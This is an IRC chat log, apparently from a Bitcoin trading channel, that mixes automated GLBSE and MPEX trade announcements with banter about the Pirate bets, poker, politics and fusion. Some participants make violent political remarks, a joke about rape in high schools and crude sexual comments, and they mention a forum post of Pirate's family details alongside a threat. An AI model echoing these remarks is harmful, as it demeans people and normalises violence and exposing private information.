[S.MPOE] 34052 @ 0.00038248 = 13.0242 BTC [-] Aug 27 03:33:57 BTCHero buy calls. Aug 27 03:34:00 [GLBSE] [PUREMINING] 1 @ 0.095 BTC [+] Aug 27 03:35:22 [GLBSE] [FOO.PPPPT] 5 @ 0.35 = 1.75 BTC [-] Aug 27 03:36:11 .py 4764/2000.0 Aug 27 03:36:11 2.382 Aug 27 03:36:15 fuck yeah Aug 27 03:36:56 bought in at 2, cashed out with 4.764 Aug 27 03:38:53 smick: What security? : O Aug 27 03:39:00 poker ;) Aug 27 03:39:15 lol Aug 27 03:39:58 [GLBSE] [BTC-MINING] 1 @ 0.98 BTC [-] Aug 27 03:40:33 aww, cashouts are paid within 24 hrs :/ Aug 27 03:40:58 but is ilk Aug 27 03:41:32 huh? Aug 27 03:42:00 [GLBSE] [SYNERGY] 2 @ 0.193 = 0.386 BTC [+] Aug 27 03:42:44 daughter got to the keyboard Aug 27 03:42:44 Why do all penny stocks, without fail, start with that huge spike and crash? Aug 27 03:43:15 [GLBSE] [GSDPT] 440 @ 0.0035 = 1.54 BTC [+] Aug 27 03:43:30 oh god, there's an asset called SYNERGY? Aug 27 03:43:48 Corporate-speak company. Aug 27 03:44:14 Bringing synergy to the workplace(TM) Aug 27 03:44:19 [GLBSE] [PUREMINING] 1 @ 0.09938 BTC [+] Aug 27 03:44:35 oh wow, i just realized you could use bitinstant to 'deposit' usd to any btc addy Aug 27 03:44:42 EmanuelDeOrtego: they come up with new corporate terms, and then make royalties off them? Aug 27 03:44:45 lovely idea Aug 27 03:44:59 the 'any' didn't really click with me before now Aug 27 03:45:38 SYNERGY? reminds me of a Dilbert cartoon... Aug 27 03:45:38 I would buy the shit out of a BitInstant IPO Aug 27 03:45:50 BitInstant IPO? I'd be in Aug 27 03:45:53 that's exactly why there won't be one Aug 27 03:45:54 reminds me of that one comercial Aug 27 03:46:28 no you wouldn't, you'd be all "too high p/e x" Aug 27 03:46:31 there was the clueless director, the yesman, the buzzword guy, and a woman in a confrence Aug 27 03:47:03 it played this senario in 3 decades, the 70's, 80's and 90's Aug 27 03:47:28 each time the director aske 'what do we do?' Aug 27 03:47:36 EmanuelDeOrtego: I would buy into IPOs just for the quarterly reports :P Aug 27 03:48:08 everyone gave predictable answers for their era, but then the janitor would chime in 'burn it!' Aug 27 03:48:36 [MPEX] [S.MPOE] 389 @ 0.00038248 = 0.1488 BTC [-] Aug 27 03:48:37 [MPEX] [S.MPOE] 41700 @ 0.00038237 = 15.9448 BTC [-] Aug 27 03:48:39 [MPEX] [S.MPOE] 7411 @ 0.00038183 = 2.8297 BTC [-] Aug 27 03:49:44 [GLBSE] [JAH] 1 @ 0.16 BTC [-] Aug 27 03:50:31 Matthew is now at 13690 BTC in bets: https://docs.google.com/spreadsheet/ccc?key=0Ajtx05YrHtIydFVHcGxLOExTbnhqajJLZmlSZUNtM3c#gid=0 Aug 27 03:50:46 [GLBSE] [NYAN.C] 49 @ 0.7 = 34.3 BTC [+] Aug 27 03:50:49 That's some massive bets... Aug 27 03:51:06 [GLBSE] [NYAN.C] 13 @ 0.71 = 9.23 BTC [+] Aug 27 03:51:29 Bets that pirate pays back 100% WITH interests. Aug 27 03:51:35 Matthew is going to lose everything Aug 27 03:51:53 [GLBSE] [SILVER] 17 @ 0.00999999 = 0.17 BTC [-] Aug 27 03:51:57 or get the boot if he can't pay Aug 27 03:52:05 BTC-Mining: i thought the max was 10000btc on that bet Aug 27 03:52:17 He... keeps taking bets apparently Aug 27 03:52:25 maybe MNW just needed an excuse to leave the community? Aug 27 03:52:41 there is something wrong there obviously, can't wait to find out what Aug 27 03:52:49 [GLBSE] [OBSI.HRPT] 1 @ 0.10399 BTC [+] Aug 27 03:52:51 [GLBSE] [OBSI.HRPT] 4 @ 0.104 = 0.416 BTC [+] Aug 27 03:52:58 Well, to me it's a safe bet Aug 27 03:53:11 heh, seems legit to me, get out of a place where you don't want to be, or get paid bank to stay there Aug 27 03:53:26 BTC-Mining: he's only taking bets from people he think will pay if they lose though Aug 27 03:53:44 yup Aug 27 03:53:45 i bet him 6 whole coins Aug 27 03:54:33 To lose tho, Pirate would need to refund everyone... in full... with interest... Aug 27 03:54:53 BTC-Mining: did it include interest? Aug 27 03:54:56 BTC-Mining: in the bet? Aug 27 03:54:59 yes Aug 27 03:55:10 oh MNW is fucked then Aug 27 03:55:13 Pirate has to pay ALL, with all guaranteed interests Aug 27 03:55:13 waht amount of interest (in the bet)? Aug 27 03:55:51 The bet is as described in pirate's thread (where pirate says he'll pay back all funds with full interest) Aug 27 03:55:53 130,000 dollars down the drain Aug 27 03:56:05 bo bitcoins Aug 27 03:56:10 not dollars Aug 27 03:56:20 Well, in dollars Aug 27 03:56:23 [GLBSE] [PPT.B] 13 @ 0.5 = 6.5 BTC [-] Aug 27 03:56:24 say it, bit-coin Aug 27 03:56:24 D: what i couldn't do with >10kbtc Aug 27 03:56:32 I mean, he doesn't have the Bitcoins Aug 27 03:56:36 He has to buy them Aug 27 03:56:39 He bets that pirate will pay as he described Aug 27 03:56:45 like he will really pay, i just want something new to cry about... "mnw didn't pay me" Aug 27 03:56:49 smickles if i get over 10k btc Aug 27 03:56:54 Why wouldn't ha have them? Aug 27 03:56:55 i'm sending it to you to manage Aug 27 03:57:02 [GLBSE] [PPT.A] 7 @ 0.5 = 3.5 BTC [-] Aug 27 03:57:12 If he doesn't, he'll just get in trouble. Aug 27 03:57:18 jcpham: I'll do my best, but don't expect 7% weekly Aug 27 03:57:18 for a fee of course Aug 27 03:57:21 Because he thinks he's win Aug 27 03:57:25 [GLBSE] [PPT.E] 1 @ 0.5 BTC [-] Aug 27 03:57:28 he'll* Aug 27 03:57:43 EmanuelDeOrtego: i'm sure he thinks he's win too Aug 27 03:58:01 Well if you think pirate doesn't pay back... go bet for the heck of it. Aug 27 03:58:06 His girlfriend will leave him and he'll live off his friends Aug 27 03:58:27 And be along everyone complaining and getting him out of the community =/ Aug 27 03:58:32 BTC-Mining: Objectively, I just see it as a gamble. Aug 27 03:58:39 Pretty much Aug 27 03:58:54 [GLBSE] [PPT.B] 25 @ 0.5 = 12.5 BTC [-] Aug 27 03:59:00 it could be a hedge for some tho Aug 27 03:59:10 wow .5 on ppt? Aug 27 03:59:18 seems high to me Aug 27 03:59:21 i haven't been paying attention Aug 27 03:59:22 any news is good news i guess Aug 27 03:59:44 jcpham: there were some people buying some ppts at >1 Aug 27 03:59:46 yesterday Aug 27 03:59:56 lunacy Aug 27 04:03:30 I think the market has already written off Pirate's non-existent Bitcoins Aug 27 04:05:40 yowsers Aug 27 04:06:31 [GLBSE] [ASICMINER] 25 @ 0.09 = 2.25 BTC [+] Aug 27 04:08:16 [GLBSE] [FPGAMINING] 1 @ 0.95 BTC [+] Aug 27 04:10:48 [MPEX] [S.MPOE] 34054 @ 0.00038183 = 13.0028 BTC [-] Aug 27 04:12:22 mircea_popescu: shouldn't the s.dice bid now be 0.0037 BTC? Or does the second block of 5M shares have to completely sell out first? Aug 27 04:12:38 second block needs to sell out Aug 27 04:12:45 last 3 million will be 0.0037 Aug 27 04:12:49 hmm why didn't the 2nd block go in ? Aug 27 04:12:50 1 sec Aug 27 04:13:13 [GLBSE] [PUREMINING] 3 @ 0.09938 = 0.2981 BTC [+] Aug 27 04:14:04 [GLBSE] [PPT.B] 9 @ 1.02 = 9.18 BTC [+] Aug 27 04:14:15 there we go. Aug 27 04:14:20 timezones >< Aug 27 04:14:34 [GLBSE] [ARS] 24 @ 0.01405 = 0.3372 BTC [-] Aug 27 04:14:46 [MPEX] [B.MPCD.C] 64 @ 0.001045 = 0.0669 BTC [+] Aug 27 04:16:41 cool.. I'm new to this IPO stuff, so I wasn't sure. Aug 27 04:16:55 [GLBSE] [PUREMINING] 6 @ 0.08 = 0.48 BTC [-] Aug 27 04:17:19 they're there, course you wouldn't buy into them till the other batch sold out, so BTC-Mining is mostly right Aug 27 04:17:27 more of a clerical point. Aug 27 04:17:46 [GLBSE] [PUREMINING] 17 @ 0.08 = 1.36 BTC [-] Aug 27 04:17:51 [GLBSE] [CIUCIU.BOND] 250 @ 0.1 = 25 BTC [+] Aug 27 04:19:51 [GLBSE] [OBSI.HRPT] 240 @ 0.104 = 24.96 BTC [+] Aug 27 04:21:13 aye Aug 27 04:22:46 [GLBSE] [BLUECHIP] 1000 @ 0.1 = 100 BTC Aug 27 04:24:43 [GLBSE] [SS] 20 @ 1.95 = 39 BTC [-] Aug 27 04:24:44 [GLBSE] [SS] 30 @ 1.98 = 59.4 BTC [+] Aug 27 04:25:09 [GLBSE] [FPGA.CONTRACT] 1 @ 0.1298 BTC [+] Aug 27 04:28:08 [GLBSE] [NASTY] 1 @ 0.64 BTC [+] Aug 27 04:28:44 [GLBSE] [MOVETO.FUND] 2 @ 1.19 = 2.38 BTC [-] Aug 27 04:28:45 [GLBSE] [MOVETO.FUND] 40 @ 1.19739576 = 47.8958 BTC [+] Aug 27 04:30:11 [MPEX] [O.BTCUSD.P140T] 1 @ 0.39966036 BTC [+] Aug 27 04:32:09 [GLBSE] [GIGAMINING] 70 @ 0.96 = 67.2 BTC [+] Aug 27 04:32:11 [GLBSE] [GIGAMINING] 10 @ 0.961 = 9.61 BTC [+] Aug 27 04:32:52 [GLBSE] [GIGAMINING] 5 @ 0.961 = 4.805 BTC [+] Aug 27 04:36:30 Yeah, but the silent majority of Bitcoiners are leftists/socialists. Satoshi, most likely, is one of them. It's not at all shocking we are beginning the process of having government regulate Bitcoin, as a currency it was designed for this to happen. Aug 27 04:36:31 o ya ? Aug 27 04:36:39 who the fuck is a socialist ? raise your right hand Aug 27 04:37:23 Rarity? Aug 27 04:37:28 Is that you? Aug 27 04:37:48 copumpkin: really? Aug 27 04:37:53 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2701 BTC [-] Aug 27 04:37:55 totally Aug 27 04:37:55 [GLBSE] [TYGRR.BOND-P] 1 @ 0.27 BTC [-] Aug 27 04:37:56 [GLBSE] [TYGRR.BOND-P] 1 @ 0.25 BTC [-] Aug 27 04:37:57 [GLBSE] [TYGRR.BOND-P] 5 @ 0.241 = 1.205 BTC [-] Aug 27 04:37:58 [GLBSE] [TYGRR.BOND-P] 1 @ 0.24 BTC [-] Aug 27 04:37:59 [GLBSE] [TYGRR.BOND-P] 10 @ 0.23 = 2.3 BTC [-] Aug 27 04:38:00 [GLBSE] [TYGRR.BOND-P] 11 @ 0.223 = 2.453 BTC [-] Aug 27 04:38:01 [GLBSE] [TYGRR.BOND-P] 20 @ 0.2202 = 4.404 BTC [-] Aug 27 04:38:02 [GLBSE] [TYGRR.BOND-P] 100 @ 0.22001001 = 22.001 BTC [-] Aug 27 04:38:03 [GLBSE] [TYGRR.BOND-P] 30 @ 0.2112 = 6.336 BTC [-] Aug 27 04:38:03 :0 Aug 27 04:38:04 [GLBSE] [TYGRR.BOND-P] 500 @ 0.2 = 100 BTC [-] Aug 27 04:38:15 20% damn Aug 27 04:38:41 EmanuelDeOrtego you know the idiot "? Aug 27 04:38:52 copumpkin just has issues with authoritah. Aug 27 04:38:53 Yes. Aug 27 04:38:56 [GLBSE] [TYGRR.BOND-P] 1 @ 0.15 BTC [-] Aug 27 04:38:58 [GLBSE] [BIB.PIRATE] 70 @ 0.22000001 = 15.4 BTC [-] Aug 27 04:39:06 The people who understand communism Aug 27 04:39:08 EmanuelDeOrtego tell him he needs a new sister, this one can't suck cock worth a shit. Aug 27 04:39:20 EmanuelDeOrtego: I think he's talking about the dostoevsky book Aug 27 04:39:29 True communists believe freedom is a resource to be rationed. Aug 27 04:39:32 [GLBSE] [FOO.PPPPT] 81 @ 0.33500011 = 27.135 BTC [-] Aug 27 04:40:06 EmanuelDeOrtego: have you read marx and such? Aug 27 04:40:06 [MPEX] [F.GIGA.ETF] 2746 @ 0.00103374 = 2.8387 BTC [-] Aug 27 04:40:07 [MPEX] [F.GIGA.ETF] 254 @ 0.00100036 = 0.2541 BTC [-] Aug 27 04:40:17 copumpkin: Yes. Unfortunately. Aug 27 04:40:29 I've read the communist manifesto, haven't read capital yet though Aug 27 04:40:32 how come? Aug 27 04:40:48 [GLBSE] [BTC-MINING] 1 @ 0.98 BTC [-] Aug 27 04:40:55 copumpkin: idk Aug 27 04:41:52 such vile, putrid nonsense. why not read dianetics while you're at it. Aug 27 04:42:08 mircea_popescu opinion on the matter is discounted for being biased Aug 27 04:42:39 o right, i see. communists have unbiased oppinions Aug 27 04:42:51 yes, communists are perfect Aug 27 04:42:52 being so damned stupid as to have nothing to do with reality. thus perfectly biasless Aug 27 04:42:54 i mean baseless. Aug 27 04:43:15 i just want mccarthy back. Aug 27 04:43:19 lol Aug 27 04:43:21 [MPEX] [S.MPOE] 30523 @ 0.00038435 = 11.7315 BTC [+] Aug 27 04:43:23 [MPEX] [S.MPOE] 15477 @ 0.00038441 = 5.9495 BTC [+] Aug 27 04:43:38 Communists can have their ideals but as soon as they try to enforce it on me Aug 27 04:43:39 being a communist should be a capital offense. Aug 27 04:43:47 they are getting a full magazine of ammunition Aug 27 04:43:49 lol Aug 27 04:43:57 sounds like a just reaction Aug 27 04:44:22 [GLBSE] [BIF.BTCST.PPT] 10 @ 0.005 = 0.05 BTC [-] Aug 27 04:44:26 EmanuelDeOrtego: more likely if they come for you, they'll have bigger guns and more people to throw at you than you can fight off Aug 27 04:44:30 and then they will capture you Aug 27 04:44:33 and force you to give things away Aug 27 04:44:39 to people who don't deserve them Aug 27 04:44:52 muahahahahaha! Aug 27 04:44:54 lol is he trying to troll ? Aug 27 04:45:04 I know local militias Aug 27 04:45:13 We can fight Aug 27 04:45:14 I HAVE A COUSIN WHO WAS IN THE SEALS Aug 27 04:45:16 bitch! Aug 27 04:45:19 lol Aug 27 04:45:27 EmanuelDeOrtego: local militas will be forced into giving away things to people who don't deserve it, as well Aug 27 04:45:33 you'll all be really sad for giving shit away Aug 27 04:45:42 really fucking sad Aug 27 04:45:42 because them commies will have bigger guns Aug 27 04:45:42 and more people Aug 27 04:45:55 your ideals will go down the drain the moment you give something away to someone who doesn't deserve it Aug 27 04:46:29 i give shit away to ppl thart don't "deserve" it all the time wtf. Aug 27 04:46:33 what's "deserve" !? Aug 27 04:47:06 COMMUNIST Aug 27 04:47:14 [GLBSE] [DMC] 1 @ 0.042 BTC [-] Aug 27 04:47:16 [GLBSE] [DMC] 1 @ 0.04199 BTC [-] Aug 27 04:47:17 [GLBSE] [DMC] 7 @ 0.0411 = 0.2877 BTC [-] Aug 27 04:47:19 mircea_popescu: come with me, comrade Aug 27 04:47:42 lol Aug 27 04:47:51 are you nuts lol Aug 27 04:48:07 so wait, if i tip im a communist nao ? Aug 27 04:48:43 [GLBSE] [BDK.BND] 100 @ 0.10099999 = 10.1 BTC [-] Aug 27 04:48:46 no you're a communist mao Aug 27 04:48:51 puns :3 Aug 27 04:49:04 I am not even going to argue this. Sun Tzu would be displeased. Aug 27 04:49:08 so mircea_popescu 's a commie? Aug 27 04:49:13 i knew it\ Aug 27 04:49:16 mircea_popescu: yes Aug 27 04:49:28 mccarthy would have you in jail by now Aug 27 04:49:33 fucking red Aug 27 04:49:49 i guess that jackshit character can add this to his litany Aug 27 04:49:53 mccarthy's not here anymore, WE have to get him Aug 27 04:49:54 im a communist pornographer Aug 27 04:50:00 sweet Aug 27 04:50:01 actually by that description i own wikipedia. Aug 27 04:50:07 now EskimoBob and McCarthy will be after you Aug 27 04:50:22 EskimoBob was already after me cause his wife ran off with this greek bum Aug 27 04:50:26 25 years ago. Aug 27 04:50:26 lol Aug 27 04:50:33 oh I thought it was just because of the pr0n Aug 27 04:50:34 [GLBSE] [BDK.BND] 10 @ 0.10099999 = 1.01 BTC [-] Aug 27 04:50:36 [GLBSE] [BDK.BND] 90 @ 0.101 = 9.09 BTC [+] Aug 27 04:50:40 because pr0n is inherently immoral Aug 27 04:50:47 no. it was the pron of his ex wife. with a greek. Aug 27 04:50:48 yeah Aug 27 04:51:00 anyway, behold the only communist bitcoiner Aug 27 04:51:02 copumpkin: >inherently >immoral Aug 27 04:51:06 lol Aug 27 04:51:25 you're prolly just saying you're a communist to get some ugly bird to go home with you. Aug 27 04:51:35 she's pretty hot actually Aug 27 04:52:07 i need something Mauve Aug 27 04:52:10 when she gives head, does she share ? Aug 27 04:52:19 anyone know where I can get Mauve clothing? Aug 27 04:52:20 she stares into my asshole Aug 27 04:52:29 O_o Aug 27 04:52:37 or rather Aug 27 04:52:40 *_o Aug 27 04:52:42 mircea_popescu: the semen has to be evenly distributed Aug 27 04:52:47 mircea_popescu: so yes, she minds Aug 27 04:52:53 [GLBSE] [GIGAMINING] 3 @ 0.9738 = 2.9214 BTC [+] Aug 27 04:52:54 boonies4u except i don't need any. Aug 27 04:52:55 [GLBSE] [GIGAMINING] 42 @ 0.9739 = 40.9038 BTC [+] Aug 27 04:53:18 [GLBSE] [GSDPT] 100 @ 0.0035 = 0.35 BTC [+] Aug 27 04:53:19 I'm getting a bit sick of communism though Aug 27 04:53:22 was thinking of being a nazi next Aug 27 04:53:31 that's the spirit Aug 27 04:53:34 in a true communist state they should have weekly rape sessions in highschools. Aug 27 04:53:39 after all... the military gets horny. Aug 27 04:53:44 yeah, I agree Aug 27 04:54:06 http://seattle.cbslocal.com/2012/08/25/scientists-successfully-hack-brain-to-obtain-private-data/ i hope you didn't keep mindwallets. Aug 27 04:54:18 o shit Aug 27 04:54:36 well, total recall isn't aout of the question Aug 27 04:54:55 do I get three boobs? Aug 27 04:56:57 mk so the next person to buy 666 shares of something on mpex gets a bitcoin credited. Aug 27 04:57:01 mircea_popescu: how'd you fair at poker? Aug 27 04:57:24 i lost L:D Aug 27 04:57:25 [MPEX] [S.MPOE] 666 @ 0.00038441 = 0.256 BTC [+] Aug 27 04:57:31 o hey that was quick Aug 27 04:57:46 666 Aug 27 04:58:15 damn... Aug 27 04:58:20 that guy just made 400% :D Aug 27 04:58:20 [MPEX] [O.BTCUSD.C200T] 12 @ 0.05305401 = 0.6366 BTC [+] Aug 27 04:58:26 I need an MPEX account to participate now Aug 27 04:58:38 in the Devil's games Aug 27 05:00:48 damn, i tried to buy something for .666 btc to be cute Aug 27 05:00:56 focked: *fare Aug 27 05:01:08 your math. it is wrong. Aug 27 05:01:19 just slightly Aug 27 05:01:37 slightyl wrong math is WRONG Aug 27 05:01:39 RAGEEEEEE Aug 27 05:01:39 maybe i didn't have enough btc in my account Aug 27 05:01:53 eh, I keep getting 2-3 affiliates each month O.o Aug 27 05:02:01 what you selling ? Aug 27 05:02:10 On some text links advertising network =/ Aug 27 05:02:16 Wonder where they come from Aug 27 05:02:32 china Aug 27 05:02:33 I got 29$ apparently in it Aug 27 05:02:34 and brazil. Aug 27 05:02:43 for 5% commission on publishers Aug 27 05:02:53 if i keep up my growth at this brokerage, plus winning at poker, i could retire eventually Aug 27 05:03:14 nevermind, 10% Aug 27 05:03:21 5% is for advertisers Aug 27 05:03:27 oh, and my cat video on youtube, raking in 1 usd per month Aug 27 05:03:31 i'm golden Aug 27 05:03:35 I was getting 3$ a day long ago however Aug 27 05:03:50 Received around 900$, lasted 1 year. Aug 27 05:04:40 smickles i went in with 14 btc, lost like 10 of it a week ago. forgot about it till now. turned my 4btc into 27 btc Aug 27 05:04:42 then lost the lot. Aug 27 05:05:03 bad luck Aug 27 05:05:18 haha it's kind of how i play poker. ups and downs. Aug 27 05:05:31 i make too much irl to be bother with variance grind. Aug 27 05:05:41 Turned 4 BTC > 36 BTC > 0 BTC Aug 27 05:05:46 ya know, I technically had to declare my gambling winnings last year Aug 27 05:06:01 I kind of do like you mircea, up and downs. Aug 27 05:06:03 o you made 7k ? Aug 27 05:06:12 BTC-Mining they say iot's how noobs play. Aug 27 05:06:16 well, the better ones anyho. Aug 27 05:06:36 [GLBSE] [TYGRR.BOND-P] 100 @ 0.16010001 = 16.01 BTC [+] Aug 27 05:06:46 Actually, I tend to win, until I get tired after a few 3-4 hours playing Aug 27 05:06:56 Then I start doing random stuff Aug 27 05:07:07 and lose all my chips eh Aug 27 05:07:17 well... towards the end i was all-inning everything lol Aug 27 05:07:25 got me like 3-4 btc too lol Aug 27 05:07:29 [GLBSE] [FOO.PPPPT] 55 @ 0.33500011 = 18.425 BTC [-] Aug 27 05:07:43 usually, playing poker with friends, i do well inversely proportional to the lenght of the game because i drink at a consistant rate Aug 27 05:07:56 ... Aug 27 05:08:03 basically, my reasoning skills are gone by the time it's heads up Aug 27 05:08:45 [GLBSE] [BIB.PIRATE] 128 @ 0.22000001 = 28.16 BTC [-] Aug 27 05:09:08 of course, there was the one game were each of us brought sidearms to the game Aug 27 05:09:25 that turned out 'contranormal' Aug 27 05:10:11 ... okay there, no one's cheating! Aug 27 05:10:21 speaking of poker, i know this guy https://www.google.si/search?client=opera&rls=en&q=ljubljana+poker+conspiracy&sourceid=opera&ie=utf-8&oe=utf-8&channel=suggest Aug 27 05:10:23 hehe Aug 27 05:10:48 heh, especially when they all interprated sidearms as nerf guns, and i brought my .357 7 shot revolver Aug 27 05:11:09 speaking of poker, do you ppl know that kid from wow Aug 27 05:11:12 athena or something ? Aug 27 05:12:13 i only know leroy jenkins Aug 27 05:12:25 [GLBSE] [BITCOINRS] 1 @ 0.05099 BTC [-] Aug 27 05:13:30 [GLBSE] [LTC-MINING] 10 @ 0.411 = 4.11 BTC [-] Aug 27 05:13:31 [GLBSE] [LTC-MINING] 4 @ 0.41 = 1.64 BTC [-] Aug 27 05:14:15 smickles: lesson being: Do stupid stuff and be crazy, you'll isntantly become famous in your domain. Aug 27 05:14:31 http://www.youtube.com/watch?v=Zf9bXuAHpiw Aug 27 05:15:15 _matthew_ still taking more bets? :) Aug 27 05:15:20 hey Aug 27 05:15:21 wait Aug 27 05:15:26 athena? Aug 27 05:15:29 smickles: listen! Aug 27 05:15:36 i've seen that guy play minecraft! Aug 27 05:15:54 lol boonies4u Aug 27 05:16:13 12w34a/b is nice Aug 27 05:16:17 boonies4u: you were pretty quick on the draw for that one too Aug 27 05:16:22 Chaang-Noi: Why yes Aug 27 05:16:25 He does Aug 27 05:16:30 smickles: gotta be fast, Sanic Fast Aug 27 05:16:34 i was in the wrong chan Aug 27 05:16:37 lol Aug 27 05:17:12 [GLBSE] [BIB.PIRATE] 2 @ 0.22000001 = 0.44 BTC [-] Aug 27 05:17:14 [GLBSE] [BIB.PIRATE] 5 @ 0.22 = 1.1 BTC [-] Aug 27 05:18:10 oh lol, if that's the same athena, he's much more confident in MC than poker Aug 27 05:18:10 [GLBSE] [PUREMINING] 1 @ 0.09938 BTC [+] Aug 27 05:18:19 What was he saying by the way? Couldn't make out any word in his whinings Aug 27 05:18:47 heh, "i just went all in and he 'stacked' me" Aug 27 05:19:13 ... what the heck is that supposed to mean? Aug 27 05:19:29 he's french i think. Aug 27 05:20:01 in that context, i dunno, usu. stacked == all in Aug 27 05:20:19 that's what he means Aug 27 05:20:26 he went all in, guy didn't fold. Aug 27 05:20:31 so the guy "stacked him". Aug 27 05:20:48 stupid term Aug 27 05:20:50 in the sense that if you're 30 and still nurse everything unpleasant that happens is "they did this to me!" Aug 27 05:20:58 as in, drives car into the wall ? Aug 27 05:21:00 the wall hit me! Aug 27 05:21:14 ... Aug 27 05:21:26 goes all in opponent doesn't fold ? Aug 27 05:21:26 I get the point Aug 27 05:21:29 mircea_popescu: you make it sound more french Aug 27 05:21:29 opponent stacked him! Aug 27 05:21:35 [GLBSE] [GIGAMINING] 33 @ 0.9739 = 32.1387 BTC [+] Aug 27 05:22:47 [MPEX] [F.GIGA.ETF] 14222 @ 0.00100036 = 14.2271 BTC [-] Aug 27 05:22:49 [MPEX] [F.GIGA.ETF] 3799 @ 0.0009956 = 3.7823 BTC [-] Aug 27 05:22:50 [MPEX] [F.GIGA.ETF] 19081 @ 0.00099409 = 18.9682 BTC [-] Aug 27 05:22:50 [MPEX] [F.GIGA.ETF] 10351 @ 0.00098257 = 10.1706 BTC [-] Aug 27 05:22:52 [MPEX] [F.GIGA.ETF] 4688 @ 0.00095743 = 4.4884 BTC [-] Aug 27 05:22:53 [MPEX] [F.GIGA.ETF] 9859 @ 0.00095627 = 9.4279 BTC [-] Aug 27 05:23:40 Now to a more interesting topic Aug 27 05:23:52 yes? Aug 27 05:24:08 .py 6/15.0 Aug 27 05:24:09 0.4 Aug 27 05:24:11 [GLBSE] [BTC-MINING] 17 @ 0.98 = 16.66 BTC [-] Aug 27 05:24:16 http://www.efda.org/jet/jet%E2%80%99s-main-features/ Aug 27 05:24:59 Ah, how science loves to do inneficient things, just trying. Aug 27 05:25:17 most things we use today were inefficient to start with. Aug 27 05:25:22 I hear they're getting closer to getting a 0 sum reactor. Aug 27 05:25:38 Eventually, hopefully, fusion reactors that produce more than they consume Aug 27 05:25:52 BTC-Mining: that's interesting, but have you seen this: https://www.youtube.com/watch?v=oHg5SJYRHA0 ? Aug 27 05:26:14 I stopped at seeing the title Aug 27 05:26:18 ^ Aug 27 05:26:27 :P Aug 27 05:26:29 It needs ANOTHER title... Aug 27 05:26:41 BTC-Mining: what if they just can't get better than 0 sum? Aug 27 05:26:49 i kinda enjoyed it actually. Aug 27 05:26:50 or just gets closer and closer to 0 sum? Aug 27 05:26:55 [GLBSE] [COGNITIVE] 7 @ 0.6799 = 4.7593 BTC [+] Aug 27 05:26:57 I doubt it... Aug 27 05:27:19 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2879 BTC [+] Aug 27 05:27:21 [GLBSE] [TYGRR.BOND-P] 20 @ 0.288 = 5.76 BTC [+] Aug 27 05:27:21 [GLBSE] [TYGRR.BOND-P] 179 @ 0.289 = 51.731 BTC [+] Aug 27 05:27:45 [GLBSE] [TYGRR.BOND-P] 16 @ 0.289 = 4.624 BTC [+] Aug 27 05:27:45 It technically generate a lot of energy, the issue is more of how long they can sustain it compared to the energy required to jumpstart the reaction and keep it stable. Aug 27 05:28:02 But hey, it's fusion! Aug 27 05:28:08 and it works Aug 27 05:28:08 Somebody posted Pirate's family information on the forum Aug 27 05:28:11 yes, we will never run out of helium Aug 27 05:28:14 If Pirate doesn't pay Aug 27 05:28:15 right, BTC-Mining ? Aug 27 05:28:16 [GLBSE] [TYGRR.BOND-P] 1 @ 0.289 BTC [+] Aug 27 05:28:17 he's dead Aug 27 05:28:27 So, my bets are on him paying Aug 27 05:28:30 we need hydrogen, not helium Aug 27 05:28:33 else facing a horrible time Aug 27 05:28:39 deuterium and tritium Aug 27 05:28:49 BTC-Mining: then fusion doesn't do us much good, if we need hydrogen Aug 27 05:29:04 Why not? Aug 27 05:29:13 because fusion makes helium Aug 27 05:29:26 :P Aug 27 05:29:29 [GLBSE] [SYNERGY] 23 @ 0.194999 = 4.485 BTC [+] Aug 27 05:29:45 Oh, I thought you meant for making fusion with Aug 27 05:30:22 [GLBSE] [ARS] 24 @ 0.0154 = 0.3696 BTC [+] Aug 27 05:30:37 I wonder what we'll do with all the helium produced from fusion reactors Aug 27 05:30:41 make balloons? Aug 27 05:31:01 or use it for cooling? Aug 27 05:31:04 [GLBSE] [ARS] 20 @ 0.0155 = 0.31 BTC [+] Aug 27 05:31:43 save it for later fusion Aug 27 05:31:43 boonies4u: make a liquid that flows uphill Aug 27 05:31:53 smickles: lol Aug 27 05:31:58 EmanuelDeOrtego poor people can't pay. also, link ? Aug 27 05:32:01 it's true tho Aug 27 05:32:05 mircea_popescu: dear god, do we even want to go beyond helium? Aug 27 05:32:09 mircea_popescu: that sounds scary Aug 27 05:32:18 boonies4u there's nothing we won't eventually try. Aug 27 05:32:20 [GLBSE] [PUREMINING] 20 @ 0.09938 = 1.9876 BTC [+] Aug 27 05:32:25 have you seen the guy suckuing his own cock ? Aug 27 05:32:31 i won't settle until there is lead fusion @.@ Aug 27 05:32:41 smickles: why not bismuth? Aug 27 05:32:49 why not uuo Aug 27 05:32:52 [GLBSE] [ARS] 50 @ 0.016 = 0.8 BTC [+] Aug 27 05:33:11 mircea_popescu: deleted Aug 27 05:33:22 well, did you copy it ? Aug 27 05:33:49 boonies4u: to answer you question seriously Aug 27 05:33:56 Ugh, I am not going to let you murder him. Aug 27 05:34:26 smickles: bismuth is stable enough :/ Aug 27 05:34:29 i don't care either way lol Aug 27 05:34:49 [GLBSE] [PAJKA.BOND] 10 @ 0.084 = 0.84 BTC [-] Aug 27 05:35:22 the total plasma volume is 200 cubic metres Aug 27 05:37:35 ;;ticker Aug 27 05:37:35 Best bid: 10.61, Best ask: 10.6355, Bid-ask spread: 0.02550, Last trade: 10.62929, 24 hour volume: 30208, 24 hour low: 10.446, 24 hour high: 10.6355 Aug 27 05:38:07 [GLBSE] [ARS] 50 @ 0.0165 = 0.825 BTC [+] Aug 27 05:38:07 oh sorry boonies4u, i didn't finish my statement Aug 27 05:38:15 smickles: go on :3 Aug 27 05:38:32 i was going to explicitly point out that i don't have any knowledge on the topic Aug 27 05:38:55 I see Aug 27 05:39:04 well, Bismuth is technically unstable Aug 27 05:39:11 but it has an extremely long half-life Aug 27 05:39:24 and is pretty much safe to handle Aug 27 05:39:26 only for lack of trying tho Aug 27 05:39:32 [GLBSE] [TYGRR.BOND-PI] 10 @ 0.9999999 = 10 BTC [-] Aug 27 05:39:44 smickles: do you even know what a half-life is? Aug 27 05:39:48 i do Aug 27 05:40:11 i actually vaguely recall reading information about what you just said about bismuth Aug 27 05:40:17 cool :3 Aug 27 05:41:00 the half-life of bismuth is like billions of times the estimated age of the universe... Aug 27 05:41:06 after doing well at 'merican highschool chemistry and physics, i went on to study philosophy in college Aug 27 05:41:08 It's not going away anytime soon Aug 27 05:41:55 :'O Aug 27 05:41:59 Such beauty Aug 27 05:42:02 http://upload.wikimedia.org/wikipedia/commons/7/75/Bi-crystal.jpg Aug 27 05:42:24 Didn't know bismuth could look like that Aug 27 